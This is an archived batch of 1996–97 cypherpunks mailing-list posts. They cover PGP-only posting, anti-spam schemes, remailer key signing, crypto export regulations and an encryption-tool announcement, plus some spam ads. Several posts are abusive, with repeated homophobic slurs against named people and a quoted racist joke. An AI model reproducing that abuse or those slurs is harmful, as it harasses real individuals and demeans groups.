   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 31 Dec 1996 18:25:16 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <v02140b0aaeef4195b36f@[192.0.2.1]>
Message-ID: <32C9CAAE.497B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
> At 1:01 PM 12/31/1996, Z.B. wrote:
> >On Tue, 31 Dec 1996, Dale Thorn wrote:
> >> ...I will *not* install and run PGP.

> People who don't like using PGP, or can't use it, or won't use it,
> do not belong on this list.

So who died and made you the king?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 31 Dec 1996 18:34:36 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612312306.RAA00569@smoke.suba.com>
Message-ID: <32C9CCEF.71A0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> The Thorn wrote:
> > Bill Frantz wrote:
> > > All messages sent to the list must be encrypted with the list's public key.

> > So in order to post here, I hafta install and run PGP?  Well, people
> > were looking for the perfect formula to deny service to guys like me,
> > and guess what?  You found it!  I will *not* install and run PGP.

> Why not? There are acceptable email interfaces for just about every
> platform out there (pgp-elm, Eudora hooks, Private Idaho etc), and it
> really isn't _that_ much of a hassle to do.

I should clarify:  I won't use it if I don't have to, and I could make
a list of reasons if need be.  I think the requirement to use PGP could
be an excellent way to shake off a lot of subscribers/posters, many of
whom heavy users of the list would like to see go away anyway.

All I'm really pointing up is the exclusion of a class of subscribers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 31 Dec 1996 18:41:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: premail.
In-Reply-To: <199612310527.GAA12868@basement.replay.com>
Message-ID: <v03007804aeef7eebc624@[199.182.128.36]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:27 PM -0800 12/30/96, Anonymous wrote:
>A scenario:
>
>1) The spooks put a bug (named Eve) on the link between
>kiwi.cs.berkeley.edu and the Internet.
>
>   Whenever kiwi.cs.berkeley.edu sents out the pubring.pgp Eve intercepts
>it and replaces it with a file of the spooks' choosing. This file will
>selectively replace the public pgp keys of some of the remailers (say exon)
>in pubring.pgp with keys to which the spooks know the private key.

(1) Protection against this scenario is what the signatures on the key are for.

(2) Nomenclature quibble: It would have to be Mallory, not Eve.  Eve can
only listen.  Mallory is a lot more dangerous because he can
alter/delete/insert messages as well as listen.


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: factnet@rmii.com
Date: Tue, 31 Dec 1996 18:17:01 -0800 (PST)
To: factnet@rmii.com
Subject: Who is the first new web page of 1997?!
Message-ID: <3.0.32.19961231184434.0094f5f0@rmi.net>
MIME-Version: 1.0
Content-Type: text/plain


Announcing the healthy birth of a bouncing new web page on
			January 1, 1997 at 12:00 a.m.:

FACTNet International Digest, a non-profit Internet digest, news service,
library, dialogue center, and archive dedicated to the promotion and
defense of global free thought, free speech, and privacy rights.

Please come visit and help spin the guest counter at:

	**********************************
	**    http://www.factnet.org    **
	**********************************

If you would like to subscribe to our free FACTNews newsletter and
you cannot access the web, or your browser does not support forms, send
e-mail to:

		facnet@rmii.com

   With a subject line that reads:   subscribe-FACTNews


===========================================
Happy New Year from the FACTNet staff!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 17:00:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Extremism in the defense of liberty is no vice
In-Reply-To: <v03007801aeef0dff9afe@[207.167.93.63]>
Message-ID: <NDuTZD58w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
>
> I'll continue to be radical in my views. Nothing wrong with extremism in
> the defense of liberty, as some wise men said.

Of course, "cypher punks" are opposed to liberty. Have you noticed that the
only crypto-relevant thread in weeks is about protocols to stop free speech?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 17:02:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Just another government fuckover: New crypto regulation
In-Reply-To: <199612312200.OAA08131@adnetsol.adnetsol.com>
Message-ID: <XkuTZD59w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ross Wright" <rwright@adnetsol.com> writes:

> On or About 31 Dec 96 at 13:56, Dr.Dimitri Vulis KOTM wrote:
>
> > "Cypher punks" write stupid racist flames and postmaster complaints,
> > not code.
>
> Yes, and they are sad that ebonics IS NOT going to be a course taught
> in school.  I spoke with a source at the Oakland School District who
> said they would not allow papers to be turned in written in ebonics.
> It is just an effort for educators to better understand how their
> students may communicate.  So everyone who liked Tim May's
> fake sarcasm are now sad that they made fools of themselves.

Lying assholes like Ray Arachelian have no sense of shame, or they would
have committed mass suicide a long time ago. Can Tim May play Jim Jones
and lead his flock?

> > I am not "here" - I've been unsubscribed by the head censor,
> > cocksucker John Gilmore at the request of Ray Arachelian and Timmy
> > May. They're "here" to harrass and to flame and they don't want
> > followups from the victims of their harrassment.
>
> You are correct, there Doctor!  Just look at what just happened to
> me.

It's indicative that most of the "cypher punks" who contribute to the
only crypto-relevant thread on this mailing list in weeks - rather lame
protocols for limiting free speech - are homosexuals.  They want a
forum where they can lie and forge and flame and libel (as Ray Arachelian
does now), and where there victims will be prevented from responding.
No wonder Ray Arachelian has already accused me of "homophobia",
a sufficient reason for the cocksucker John Gilmore to unsubscribe me,
even though I said nothing about Ray's sexual perversions.

> > Yes, let's see some more "dissidents" unsubscribed! Let's see some
> > more mailbombs and postmaster complaints! Let's see punitive action
> > in response to speech! That's all "cypher punks" are good for.
>
> Yes, Yes, Yes!

Pathetic impotent liars.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 17:10:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612312032.MAA04214@crypt.hfinney.com>
Message-ID: <J1uTZD60w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney <hal@rain.org> writes:
>
> We might also want to consider the paradoxical possibility that if we
> remove the junk, the list will die!  At least now we are constantly
> reminded that the cypherpunks list exists.

It "exists" as a laughing stock for the media and the NSA.
It has no credibility, thanks to cocksucker John Gilmore's
content-based plug-pulling and censorship.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Tue, 31 Dec 1996 19:28:44 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: LAW_dno
In-Reply-To: <v0300784eaeeeccee3dec@[139.167.130.248]>
Message-ID: <199701010329.UAA05604@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

on 12/31/96 at 09:03 AM, Robert Hettinga <rah@shipwright.com> said:

::Fortunately, such "points" are about to go the way of the devine 
::right of Kings, the unquestioned authority of the church, and, of 
::course, rendering unto Ceasar. ;-).

::See you all in Anguilla...

        don't plan on buying a return trip-tic

        and don't forget to pay your expatriate taxes before you leave.

            --attila

  ==
  "When buying and selling are controlled by legislation, 
    the first things to be bought and sold are legislators"  
        --P.J. O'Rourke.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMslyaL04kQrCC2kFAQFysQQAnYE6imj9Auw+vT7ZGuJTQxaOS6CWLKx4
32NfRCwY+7ul1ED3JmXfzbWWEtY4N7YngyU9Vdl4Mr/3XyEcTWI1+bqxEWj4pSSH
zaw40rxb0n+8lrNTJSbNceMcskmSiGgd4IPbEZL7I1FlasqDLMOZnqoLBNPdcYIj
nEtcpV68Zf8=
=Rjbo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 17:50:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonite Notes from All Over
In-Reply-To: <199612312313.QAA09275@web.azstarnet.com>
Message-ID: <eowTZD61w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


drose@AZStarNet.com writes:
>
> 4. What's the difference between a bowling ball and a black woman?  If
> you're really, really hungry, you can always eat the bowling ball.

So, what else can you expect from a "cypher punk"...

That's the kind of traffic cocksucker John Gilmore likes.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Big Moma <moma@nym.alias.net>
Date: Tue, 31 Dec 1996 12:50:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: premail.
In-Reply-To: <199612310718.BAA02863@manifold.algebra.com>
Message-ID: <19961231204939.16032.qmail@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) wrote:
> Anonymous wrote:
> > 
> > A scenario:
> > 
> > 1) The spooks put a bug (named Eve) on the link between
> > kiwi.cs.berkeley.edu and the Internet.
> 
> ......
> 
> A good scenario. A truly paranoid premail users should verify who signed
> the remailer keys. If you trust the signators and they signed the keys, 
> you are "safe". Just do pgp -kvv some@remailer.com and see what comes up.
> 
> Maybe remailer operators should asks someone reputable to sign their
> remailers' keys so that the users can easily verify the signatures.

	Yes, that is one part of it. Another part is that Raph should
include a public PGP key in the premail program and then sign both the
remailer-list and the pubring at kiwi.cs.berkeley.edu with it. The public
key included in premail should be

1) Used to sign the premail distribution itself.
2) Emailed to various mailing lists such as cypherpunks and also mirrored
at various internet sites, so it cannot be spoofed by spooks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jorge Hernandez <jorge@mailloop.com>
Date: Tue, 31 Dec 1996 18:13:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Bulk Mailing Software
Message-ID: <199701010213.VAA00550@alberta.sallynet.com>
MIME-Version: 1.0
Content-Type: text/plain


Mailloop is bulk mailing software that will revolutionize how
people advertise on the internet.

See what all the fuss is about:

http://www.mailloop.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 31 Dec 1996 19:04:24 -0800 (PST)
To: zachb@netcom.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <Pine.3.89.9612311230.A1152-0100000@netcom9>
Message-ID: <199701010319.VAA00222@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Babayco wrote:
> I agree with Dale here...requiring PGP in order to post would probably 
> deter low-level, idiot spammers, but it would also keep those people off 
> the list who, for one reason or another, don't like/want/use PGP.  Also, 

     This is cypherpunks, if we can't be bothered to use crypto software,
then how can we tell others they should? 

> what about people who post to and read the list from someplace other than 
> their home computer, like school or work?  I have access to this account 
> from my college, but I'm sure not going to leave my keys lying around 
> my account just so I can post to a mailing list.

     Seperate key for that account/mailing list.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 31 Dec 1996 21:24:00 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Extremism in the defense of liberty is no vice
In-Reply-To: <NDuTZD58w165w@bwalk.dm.com>
Message-ID: <32C9F4A4.6394@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> "Timothy C. May" <tcmay@got.net> writes:
> > I'll continue to be radical in my views. Nothing wrong with extremism in
> > the defense of liberty, as some wise men said.

> Of course, "cypher punks" are opposed to liberty. Have you noticed that the
> only crypto-relevant thread in weeks is about protocols to stop free speech?

Could it be that most "serious" list subscribers are "security people"?

And who are the people in the U.S. who are most abusive of individual
rights and freedoms?  Voila.  Hence the heavy emphasis on preventing
this and that....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mozart@asianet.net.hk
Date: Tue, 31 Dec 1996 05:54:07 -0800 (PST)
Subject: Musical Instruments  WELCOME TO INTERNET'S BEST FULL LINE MUSIC STORE
Message-ID: <199612311325.VAA22954@s1.asianet.net.hk>
MIME-Version: 1.0
Content-Type: text/plain


We supply worldwide the EXACT SAME musical instruments & accessories
that one can purchase from the local importers, wholesalers, stores,
and teachers, BUT FOR LESS! 100% SATISFACTION GUARANTEED!

We stock US$ millions in all types of musical instruments and
accessories from more 3,000 manufacturers. Orders may be placed in
any quantity mix, and shipped directly to you. No minimum orders!

For DETAILS, mailto:mozart@asianet.net.hk a BLANK message ONLY and
type "INFO" in the SUBJECT HEADER. We sincerely apologize if this
is an unwanted e-mail. Please hit REPLY and type "REMOVE" in the
SUBJECT area and SEND to be removed from this list.
				     _
               _ _ _                / \		-A ll brands/models
   |\___ALAMO__|_|_|_(__MUSIC LTD._//\ \	-L argest selection
   |/----//---[!|!|!]-----\\-------\\/ /	-A ll credit cards
         [| (L|O|W|E|S|T) |]        \_/		-M ost traffic site
         \\=(P|R|I|C|E|S)=//			-O ne-Stop Cyber Shop
          \\__|*|*|*|____//			
              [_]_[_]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 31 Dec 1996 21:27:11 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Zippy, anonymously
Message-ID: <3.0.1.32.19961231212403.01244230@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:18 PM 12/31/96 -0500, Adam Shostack wrote:
>http://www.metahtml.com/apps/zippy/welcome.mhtml
>
>Let Zippy provide you with web service.  Chaining through the
>anonymizer works, too. :)

A suggested page is:

http://www.metahtml.com/apps/zippy/zippy.mhtml/http://www.nsa.gov:8080/dirnsa/

Pretty damn funny! (At least the version I got...)

---
|   If you're not part of the solution, You're part of the precipitate.  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 31 Dec 1996 18:44:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: RCMP on InfoSec
Message-ID: <1.5.4.32.19970101024042.0070c464@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Mounties have put out an impressive document on 
comprehensive security for information technology: 
encryption and TEMPEST, construction standards and 
secure rooms, hardware and software, management and 
personnel:

   Technical Security Standard for Information Technology
   Royal Canadian Mounted Police 
   August 1995

Part One (Chapters 1-4)

  http://jya.com/rcmp1.htm  (71K, plus graphics)

Part Two (Chapters 5-8)

  http://jya.com/rcmp2.htm  (81K, plus graphics)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 31 Dec 1996 20:10:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <v03007800aeef39814783@[207.167.93.63]>
Message-ID: <wX3TZD63w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> (Needless to say, if John Gilmore _chooses_ to impose a posting fee, this
> is his right. Caveat poster.)

The stupid cocksucker, asshole censor John Gilmore has already so thoroughly
destroyed his credibility with his content-based censorship and plug-pulling,
that almost nothing can damage it any further. John Gilmore is a proven liar,
a censor, and an outright jerk. (Mark: He also has bad table manners.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Molnar <bigdaddy@shell.skylink.net>
Date: Tue, 31 Dec 1996 23:17:19 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199701010319.VAA00222@smoke.suba.com>
Message-ID: <Pine.SUN.3.91.961231222206.3400A-100000@shell.skylink.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Dec 1996, snow wrote:

> Babayco wrote:
>      This is cypherpunks, if we can't be bothered to use crypto software,
> then how can we tell others they should? 
	Do you think there is a difference between encouragement and dogma?
Sorry. I apologize for my emotional involvement; I find this issue 
annoying, mainly because it will affect me directly. 

> 
> > what about people who post to and read the list from someplace other than 
> > their home computer, like school or work?  I have access to this account 
> > from my college, but I'm sure not going to leave my keys lying around 
> > my account just so I can post to a mailing list.
> 
>      Seperate key for that account/mailing list.
	What about those without persistent storage? Many computer labs 
in schools and libraries choose to install security software of some 
sort. This causes their machines to behave in odd ways, insofar as they 
find and delete all foreign data. A variant of the same quirk prevents 
one from recognizing any but a select set of applications, no matter 
where they are placed.

Netscape is one of these apps. PGP is not.

My only access to e-mail, during much of the year, is through just such 
a lab. As a result, I am in the unenviable position of using hotmail.com and 
mailmasher.com for most of my correspondence. Even if it were possible to 
install PGP on these machines, there is no provision as yet for the kind 
of integration possible with, say, Eudora, PIdaho, or pine. Special 
client software might ameliorate the problem, but will not be installed 
without much administrative hand-wringing.

I am fortunate enough to have my own computer. I can create messages 
there w/PGP and then bring them to a networked computer for sending. My 
chances of doing so are about equal to the chance that UNLV will win the 
Rose Bowl next year. 

The simple fact is that I am lazy. I respond to messages on cypherpunks 
spontaneously, as I see topics of interest (and this is one of 'em!). 
Rather than somehow forcing me to spend more "thought" and "energy" in my 
posts, these kinds of measures will create frustration and 
disillusionment, _ESPECIALLY_ when things fail to interface correctly and 
cause my messages to bounce. I have no patience for such arbitrary criteria.

Making message delivery harder will not magically cause me to spend more 
time on the actual composition. It will simply take time away from the 
next message. I try to spend a fair amount of time on each post 
already...why should I be penalized for attempting to contribute?

In any case, what bogeyman are we worried about, anyway? Pseudonyms? This 
list is already full of 'em. That's nothing new. Forged messages? If you 
trust anything you read on the Internet...well.. Privacy? It's a public 
mailing list, and one which I have long respected for its tradition of 
openness and inclusion.
<casts nervous glance>

Sorry about the ranting, but as I noted above, my own ox is being gored 
here. :-) 

-David Molnar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 31 Dec 1996 20:29:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hardening lists against spam attacks
In-Reply-To: <199612312032.MAA04214@crypt.hfinney.com>
Message-ID: <Pine.LNX.3.95.961231232113.2776A-100000@eclipse.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 31 Dec 1996, Hal Finney wrote:

> This is an interesting idea, however it will be possible for someone with
> a respectable public persona to continue getting tokens indefinately for
> posting abusive anonymous messages.  There is no way to link the anonymous
> tokens with the ones which were issued to good subscribers.

If the number of tokens given to each subscriber per day is limited (5 to 7
is probably reasonable), then this will limit the amount of abusive anonymous
messages posted.  This scheme might not prevent people from anonymously
posting abusive messages, but it will prevent spam.

Limiting the number of abusive anonymous messages one can post is an
interesting idea, but this only allows pseudonymity and not anonymity.  The
pseudonymity-anonymity issue seems to be a trade-off between more privacy and
less noise.


Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsnpCSzIPc7jvyFpAQFovggAhOFPeHaj/huH/kQUSI7FViH8TrUOH3X1
c3Ux5ZjiBPyO0dknI2crLhDZuBYf5dVH0K6rR5D5vXMsNn6+0p8Ec4w5HXouHN6K
zP6sUnntcFXFuddOblit8R4LGCZbmaW+7WZBp4h+UfBsN1Xg/iP156VrwFy7eBve
MXhyoROwDpRq8ENceqA9CvgyXtbjb5xBJVnB8rj+y5qc0kQH4mFZZZBRX+sgXHdI
6XdI7R1Thoy8ZXa+LQV+imOe68lykPYaV1rKkqC91Ne7kjMGh09qOPseVWl2RAqe
8dacmuneryrsEr8MMXJPAyOqSSrTpKEIHF//MmL+IkRePd1nv4zaAg==
=ckjR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 2 Jan 1997 01:23:47 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Crypto reg clarification from Commerce Department
Message-ID: <199701020923.BAA28031@netbox.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green  wrote:

>I just got of the phone with Bruce Kutz, Export Policy Analyst, Office of
>Strategic Trade and Foreign Policy Controls. (202) 482-0092. He seems to be
>the contact person for the new regs.

Well done, Lucky.

This is what's needed to kick off a lot of commentary during the next
45-days. Backed by research, to be sure. The outpouring of such
commentary on the full EAR from May 1995 to March 1996 shaped the
final document, and that process is an excellent case study for how
to affect the final form of the latest crypto regs.

It's worth perusing the full EAR in the Federal Register: March 25, 1996 
(Volume 61, Number 58), Pages 12713 et seq. for 325 pages (well 
over a 2.5MB -- it's also on our site, see URL below).

Here's the portion of the EAR that Lucky and Kutz discussed:

[Page 12805]

Sec. 744.6  Restrictions on certain activities of U.S. persons.

    (a) General prohibitions--(1) Activities related to exports. (i) No 
U.S. person as defined in paragraph (c) of this section may, without a 
license from BXA, export, reexport, or transfer to or in any country 
other country, any item where that person knows that such item:
    (A) Will be used in the design, development, production, or use of 
nuclear explosive devices in or by a country listed in Country Group 
D:2 (see Supplement No. 1 to part 740 of the EAR).
    (B) Will be used in the design, development, production, or use of 
missiles in or by a country listed in Country Group D:4 (see Supplement 
No. 1 to part 740 of the EAR); or
    (C) Will be used in the design, development, production, 
stockpiling, or use of chemical or biological weapons in or by a 
country listed in Country Group D:3 (see Supplement No. 1 to part 740 
of the EAR).
    (ii) No U.S. person shall, without a license from BXA, knowingly 
support an export, reexport, or transfer that does not have a license 
as required by this section. Support means any action, including 
financing, transportation, and freight forwarding, by which a person 
facilitates an export, reexport, or transfer without being the actual 
exporter or reexporter.
    (2) Other activities unrelated to exports. No U.S. person shall, 
without a license from BXA:
    (i) Perform any contract, service, or employment that the U.S. 
person knows will directly assist in the design, development, 
production, or use of missiles in or by a country listed in Country 
Group D:4 (see Supplement No. 1 to part 740 of the EAR); or
    (ii) Perform any contract, service, or employment that the U.S. 
person knows directly will directly assist in the design, development, 
production, stockpiling, or use of chemical or biological weapons in or 
by a country listed in Country Group D:3 (see Supplement No. 1 to part 
740 of the EAR).
    (3) Whole plant requirement. No U.S. person shall, without a 
license from BXA, participate in the design, construction, export, or 
reexport of a whole plant to make chemical weapons precursors 
identified in ECCN 1C350, in countries other than those listed in 
Country Group A:3 (Australia Group) (See Supplement No. 1 to part 740 
of the EAR).
    (b) Additional prohibitions on U.S. persons informed by BXA. BXA 
may inform U.S. persons, either individually or through amendment to 
the EAR, that a license is required because an activity could involve 
the types of participation and support described in paragraph (a) of 
this section anywhere in the world.
    Specific notice is to be given only by, or at the direction of, the 
Deputy Assistant Secretary for Export Administration. When such notice 
is provided orally, it will be followed by a written notice within two 
working days signed by the Deputy Assistant Secretary for Export 
Administration. However, the absence of any such notification does not 
excuse the exporter from compliance with the license requirements of 
paragraph (a) of this section.
    (c) Definition of U.S. person. For purposes of this section, the 
term U.S. person includes:
    (1) Any individual who is a citizen of the United States, a 
permanent resident alien of the United States, or a protected 
individual as defined by 8 U.S.C. 1324b(a)(3);
    (2) Any juridical person organized under the laws of the United 
States or any jurisdiction within the United States, including foreign 
branches; and
    (3) Any person in the United States.
    (d) Exceptions. No License Exceptions apply to the prohibitions 
described in paragraphs (a) and (b) of this section.
    (e) License review standards. Applications to engage in activities 
otherwise prohibited by this section will be denied if the activities 
would make a material contribution to the design, development, 
production, stockpiling, or use of chemical or biological weapons, or 
of missiles.

-----

The EAR covers all kinds of exports, so encryption and cryptography
provisions are found by searching. The Federal Register published it
in seven 50 page chunks, and is available at:

     http://www.access.gpo.gov/su_docs/aces/aces140.html

Enter the search term: "Page 12713" (with quotes; repeat six times in 
sequence).

We've combined the seven parts for searching:

     http://jya.com/ear032596.txt (2,570K)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Wed, 1 Jan 1997 20:22:48 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Kremlin v1.04
Message-ID: <199701020422.XAA29384@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


	I'm sure you all remember my program, Very Good Privacy, and have been
waiting for the release of the new version with bated breath. Well, it's
finally here! Only, after being contacted by PGP, Inc. regarding a possible
trademark violation, I've changed its name to Kremlin. Remember: it's like
an iron curtain for your data.
	The new version still uses the same algorithms. The algorithms can be
grouped into three categories: ASCII and Vigenere, which give little
security, but are extremely fast, DES, NewDES, and Safer SK-128, which will
protect against all but the most well-funded adversaries, and Blowfish,
IDEA, and RC4, which are perhaps the most secure algorithms available
today. The key-size of the algorithms ranges from 64-bits (actually
56-bits) in DES to 128-bits in IDEA, NewDES, and Safer SK-128, and infinite
length in ASCII, Blowfish (up to 448-bits), RC4, and Vigenere. If the "Hash
Passkey" option is checked, then the passkeys are hashed with a 64-bit
per-source file salt using SHA1 to form a 160-bit passkey; extra bits not
used by the fixed-length algorithms are discarded. Without the "Hash
Passkey" option checked, the passkey is only XORed with the salt and
retains its original size. If the "Encrypt Headers" option is checked, then
the filename and file size of the files are encrypted, giving an attacker
no information about the source files.
	Once the files have been encrypted, you have the option of securely
deleting them by overwriting them a user-definable number of times with
random data; the most secure encryption algorithm in the world is useless
if the plaintext is left unsecured on the hard drive. All of this is done
through one simple dialog box. To launch Kremlin, just drag a file or
directory (or a combination of files or directories) onto the Encrypt icon
on the Windows 95 desktop. To decrypt a file, just double-click on it and
enter the passkey; no unwieldy tabbed dialog boxes or file directory
navigation boxes. Plus, as a added bonus, anyone who orders 10 or more
copies of Kremlin will receive a can of Spam (TM) for free!

For more information on Kremlin, e-mail mrosen@peganet.com
To download Kremlin, go to:
http://www.geocities.com/SiliconValley/Pines/2690




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Wed, 1 Jan 1997 13:43:09 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Extremism in the defense of liberty is no vice
In-Reply-To: <9612302254.AA00731@cow.net>
Message-ID: <v0300780baeefb285e6fb@[199.182.128.36]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM -0800 12/31/96, Timothy C. May wrote:
>Our focus is more radical. We are effectively a cyber-militia, fulfilling
>Jefferson's recommendation that a revolution happen every 20 years.
>
>(Funny, there hasn't been one in more than 200 years. ...

I would say that the street action which effectively eliminated legally
mandated racial segregation about 25 years ago qualifies as a revolution.
People certainly put their bodies, and occasionally their lives, on the
line for it.  It didn't happen because the political powers that be decided
to do it.  It happened because people mobbed in the streets and made it
happen.

The same argument applies to the actions which forced the withdrawal from
Vietnam.

With the end of the cold war, and the ensuing reduction in need for the
entrenched national security establishment, we may be ripe for another one.
I personally hope our government will continue to show that it is civilized
by keeping the blood shed to a minimum.


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Wed, 1 Jan 1997 13:43:31 -0800 (PST)
To: "Timothy C. May" <snow@smoke.suba.com>
Subject: Re: Internal Passports
In-Reply-To: <199612311859.MAA01032@smoke.suba.com>
Message-ID: <v0300780caeefb53f8b00@[199.182.128.36]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM -0800 12/31/96, Timothy C. May wrote:
>There have been several reports cited here recently about changes in the SS
>laws to make the SS number more of an ID number. ...
>
>And concerns about "identity theft" when such a simple thing as an SS
>number is the key to so many records, rights, etc.

I don't see how you can have the SS number be both a public ID number and a
secret password.  Perhaps you could have it be one, but not both.  It seems
to me that parts of our society are trying have it be a password and parts
a public ID number.  (Perhaps the same parts?)  Doing both just won't work.

(Using SS as a password is subject to all the stealing and replay attacks
that make passwords a really bad idea for secure identification.)


-------------------------------------------------------------------------
